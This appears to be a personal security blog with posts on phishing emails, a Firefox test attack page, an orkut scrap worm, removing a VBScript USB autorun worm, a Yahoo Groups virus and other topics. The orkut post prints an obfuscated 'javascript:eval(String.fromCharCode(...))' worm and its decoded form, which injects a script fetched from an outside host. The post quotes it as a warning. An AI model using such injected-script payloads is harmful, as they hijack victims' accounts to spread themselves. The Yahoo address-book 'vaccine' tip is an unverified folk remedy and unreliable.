Nirenjan’s Space

As you probably know, Firefox 3 has a “feature” to block access to sites that have been reported to be phishing or malware hosts.

Ironically, Mozilla’s own page titled “It’s an attack” has been reported to be an attack site.

Mozilla - Reported Attack Site

Update: I stand corrected. Mozilla’s own page confirms it to be a test page for verifying that it’s Phishing and Malware protection is working correctly.

I received a mail today purported to be from Microsoft updates. The mail was just this:

URGENT: Please intall critical Windows XP/2000/2003/Vista update!

Urgent Install Get critical update (obligatory)

Concerned about privacy? When you check for updates, basic information about your computer, not you, is used to determine which updates your programs need. To learn more, see our privacy statement.

Now, the only link present in the original e-mail was the “Get critical update (obligatory)” one. No link to the privacy statement. No link to a Microsoft Security Advisory, nothing. And that link was to another site designed to look exactly like the Microsoft Update website.

The scary thing is that this kind of e-mail is very effective. Most people who don’t have any clue of what is going on would just click on the button, resulting in an installation that would bring in viruses, Trojans, spyware, malware, etcetera, etcetera, etcetera.

That’s why there are a lot of warnings all over. Don’t click on any link in e-mail messages, even if you believe it to be true.

(Or better yet, use Linux)

Of late, I’ve been getting a lot of scraps in orkut like “Paste this text into your address bar. Don’t worry it’s harmless…”

The latest is a pretty interesting one…

javascript:eval(String.fromCharCode(100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, 40, 48, 41))

The eval function of JavaScript takes a string and executes it as if it were JavaScript code. The String.fromCharCode function takes a series of numbers and converts it into their corresponding ASCII characters.

A simple one line C program reveals the string behind the integers (line breaks added for easy understanding):

d=document;
c=d.createElement('script');
d.body.appendChild(c);
c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';
void(0)


This is a pretty simple bit of code that appends the script located at the address shown above to the current document and executes it. Now, when I tried to get the script at the site, I get the message: This site has been disabled for violations of our Program Policies. .

A quick google search for the script file name yielded that the script simply floods your friends scrapbooks with the same message. Apparently harmless. The key word is apparently.

Now, I have a healthy dose of paranoia. I don’t trust any of these scripts unless I write them myself, or at least examine them myself. Now, I have tried to access some of the scripts directly (which should return the script source code without executing it), but the site gives me a permission denied (reason: hotlinking forbidden). That gives me all the more reason to suspect something is amiss.

I still don’t get it why people jump on scripts like this, when the orkut home page advertises (or at least used to) not to run any script when logged onto orkut. So, I’ll put out a simple security advisory.

Don’t run any script while logged into orkut (or for that matter, any website), no matter what it claims to do. For instance, one malicious script could always steal your personal information, even if you have hidden it from your friends. If a script can read your friends list, it can read anything.

It so happened that my portable hard disk got infected with this script worm for Windows. The worm itself is, in my not so humble opinion, relatively harmless. The worm itself is not really dangerous, just a real pain in the neck. Double clicking on drives will not open the drives. Instead, you will have to right-click on the drive and select open. You will see an Autoplay option when you right click the drive.

The worm is just a simple VBScript file, which when run, copies itself to the Windows folder as well as to the root folder of all available drives. In addition, it creates a file autorun.inf that causes the script to be executed whenever the drive icon is double-clicked.

Removing the worm isn’t really that hard. However, you need to be patient as if you even double click one drive accidentally, you’ll have to redo the entire procedure from start. The steps to remove the worm are as follows. It might also help to reboot into Safe Mode and login as an administrator.

1. Go to the task manager by pressing Ctrl+Alt+Delete or Ctrl+Shift+Esc
2. Go to the processes tab and stop all wscript.exe processes.
3. Open Windows Explorer and go to Tools > Folder Options.
4. In Folder Options, uncheck the following options:
   1. Hide extensions for known file types
   2. Hide protected operating system files

   Also ensure that Show hidden files and folders option is selected and press apply.

5. Go to the registry editor by typing regedit in the Run window
6. Go to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
7. There should be a key called MS32DLL or something to that effect. The value for that should be C:\Windows\MS32DLL.dll.vbs. This file name can change depending on what your Windows path is and what variant of the worm you have. However, the different versions of the worm that I have seen all install themselves in the registry and this will help you in removing the worm. Anyway, note the name and check that there is a file with the same name in the root of C:.
8. Delete this file as well as autorun.inf from your C: drive as well as all other drives. Be careful not to double click on any drive to go to it as you’ll have to start deleting the files from the beginning.
9. Delete the file from your Windows folder.
10. Delete the offending key from the registry.
11. Some variants, maybe even all, modify the title bar of Internet Explorer to show the title of the web page, followed by the text “Hacked by Godzilla” or “Hacked by Moozilla” or something else, again depending on the variant. This isn’t really a problem, but if you want the original text back, go to the registry entry at HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main. The key to be modified here is WindowTitle (I think). IE7 doesn’t seem to have an entry here, so I’m not too sure about the actual key text. Anyway, just change it to whatever you want, the default is “Microsoft Internet Explorer”
12. Restart the computer and check all drives to make sure that the Autoplay entry is no longer there on the right-click menu.
13. Congratulations. You have deleted your first worm.

Update: This worm and a host of other malware are now being created specifically to infect systems using removable media, typically USB flash disks. Inserting these disks usually causes Windows to execute the autorun scripts, if any. The autorun function can be bypassed by holding down the Shift key while inserting the disk. The Shift key needs to be held down for a few seconds until Windows can recognize the drive and add it to the list of drives in My Computer. This simple step should curtail the spread of such malware.

From /.: MySpace and GoDaddy shut down security site

From the article, apparently, a bunch of MySpace usernames and passwords were archived on Seclists.org. This information was already available on several sites and seclists.org simply mirrored the information. 1 page out of 250,000. So MySpace contacted GoDaddy directly and they suspended the domain.

WTF??? This stinks of dictatorship… I repeat what several others have already said, follow these 3 steps in order.

1. Contact the site owner and inform him/her of the offending content.
2. If that fails, then contact the hosting provider.
3. If that also fails, then, and only then, contact the registrar to suspend the domain.

So, taking this to the extreme, somebody posts a link to something interesting (I’ll let your imagination define ’something interesting’), which is a problem to somebody else. So this somebody else contacts GoDaddy and tells them to pull the plug on my website. Man, I’m glad I transferred away from GoDaddy (for a different purpose).

These guys are getting smarter, or so they want us to think. Till a few weeks back, they wanted your help to transfer some money out of the country because of some illegal activities by some company. Now, they want you to transfer the money so that it goes to charity because the holder is not likely to live that long.

Now, seriously, GIVE ME A BREAK!!!!

One, this guy from Tunisia, has been able to scrounge up $ 33 million in just 14 years. Two, his sick wife is likely to die within the next 6 months and so wants me (a trustworthy honest individual, as described in the mail) to distribute the money to charity, with 30% as my commission.

Why do I find this mail a little hard to believe?

I’m pretty sure that the entire blogging community (well, at least those on orkut) would have received invitations to join a new social networking site called Gazzag. Soon after he signed up on Gazzag, Ferrari sent a followup mail through orkut. What concerned me was that Gazzag asked the user for his/her orkut login and password, apparently to send invitations to all friends on orkut.

Now, I have a couple of points to chew on.

1. Why should Gazzag, a competitor for orkut, ask for the orkut login details? What guarantee is there that Gazzag would not hack the account? Not only that, since orkut is most probably linked to your google/gmail account, how can I be sure that Gazzag is not reading my e-mail or posting to Google Groups using my account?
2. Gazzag has a small mention that you can opt out of receiving the invitations by clicking a link in the invitation e-mail. I can count 5 links in each Gazzag invitation that I’ve received - 1 is a mailto link with the e-mail address of the person who has sent me the invite. The remaining 4 are all “Accept this invitation” style links. Now where did I put that opt-out link?

Call me paranoid, but I like to keep some semblance of my privacy intact. What do you think?

Looks like Google have done a major revamp of Orkut…

First on the list, the ability to sign up, without an invitation from an existing orkut user.

Second, at least what I have noticed, is the ability to reply to a scrap from your own scrapbook. Now you don’t need to go to the other person’s scrapbook to type your reply. Just click on the reply link and a textbox opens to type your scrap. On pressing submit, AJAX works in the background and sends your scrap to the orkut server. And, ta-dah! Your scrap has been added in the other person’s scrapbook without you leaving yours. (AN: I used to do this with a Firefox add-on before orkut was revamped the last time)

Third, I just saw this, the ability to block friend requests from people who don’t speak your language. Hmm, is this a feature or a bug? Open question…

According to the CIA, I’m a Thoughtful Observer…

Take the CIA Personality Quiz, and see for yourself, what sort of a person you are…

Looks like Google Earth has been updated with wider coverage of Chennai and the surrounding areas. For example, take a look at the aerial view of SSN College of Engineering, located about 30 km south of Tidel Park on Old Mahabalipuram Road.

One man is about to do the unthinkable…

Like Sudhish did quite some time back, I’m taking a new vow now.

(more…)

Google is looking for organizations to beta test their new GMail for domains. As a GMail user, I’d love to have something like this on my domain, but I guess they wouldn’t really accept my application to beta test it. (Besides, I really don’t have the time to test it…). But I’d love it when it comes out in production.

Read the original Slashdot story.

By now, you are probably aware that a virus has struck the Yahoo! Groups. This virus is fairly intelligent because of two reasons.

1. It searches the address book and the inbox for the word “group” and sends fake mails to that group.
2. The fake mails have a subject which is very similiar to a previous thread in the group

This particular virus has one distinguishing feature. All the virus generated mails have a mail size of around 180K to 190K. Secondly, any virus generated mail, not just this virus, has a major distinguishing feature. The From column in Yahoo will display the mail ID, not the actual name of the person which is configured.

I received some suggestions in the mail as to how to combat the spread of this virus (or for that matter, any generic virus).

1. Create an address entry with the name “!0000″ with no e-mail address
2. Create an address entry with just the e-mail address “aaa@aaa.com”
3. Create an address entry with just the e-mail address “aaabbbcccdddnothing@yahoogroups.com”

Hopefully, with the above addresses in place (they should be the first 3 entries in the address book), the spread of the virus can be stopped.

You can also prevent getting infected by a virus. Avoid opening any attachment if you don’t know the sender or you are not expecting it. Just by looking at the From field is usually sufficient - if you don’t see the name of the sender but just their ID - Select, Delete.

Good luck!

Update: If you have admin access to your group, you can also disable attachements from being sent to group members, thus avoiding the spread of the virus. You can even go the additional step and block all messages totally, without deleting the group altogether.

Two things. One, I’ve given my laptop to IBM for servicing and should probably get an estimate on it by tomorrow.

Two, I’ve installed WordPress 2.0 on this blog. The main blog won’t look any different, but the admin section is just way too cool.

Wordpress 2.0 is getting released soon. As per the official page, the release candidate is available for download. I’m waiting eagerly for the final to come out so that I can start upgrading. Can’t wait to see what’s under the hood for this release…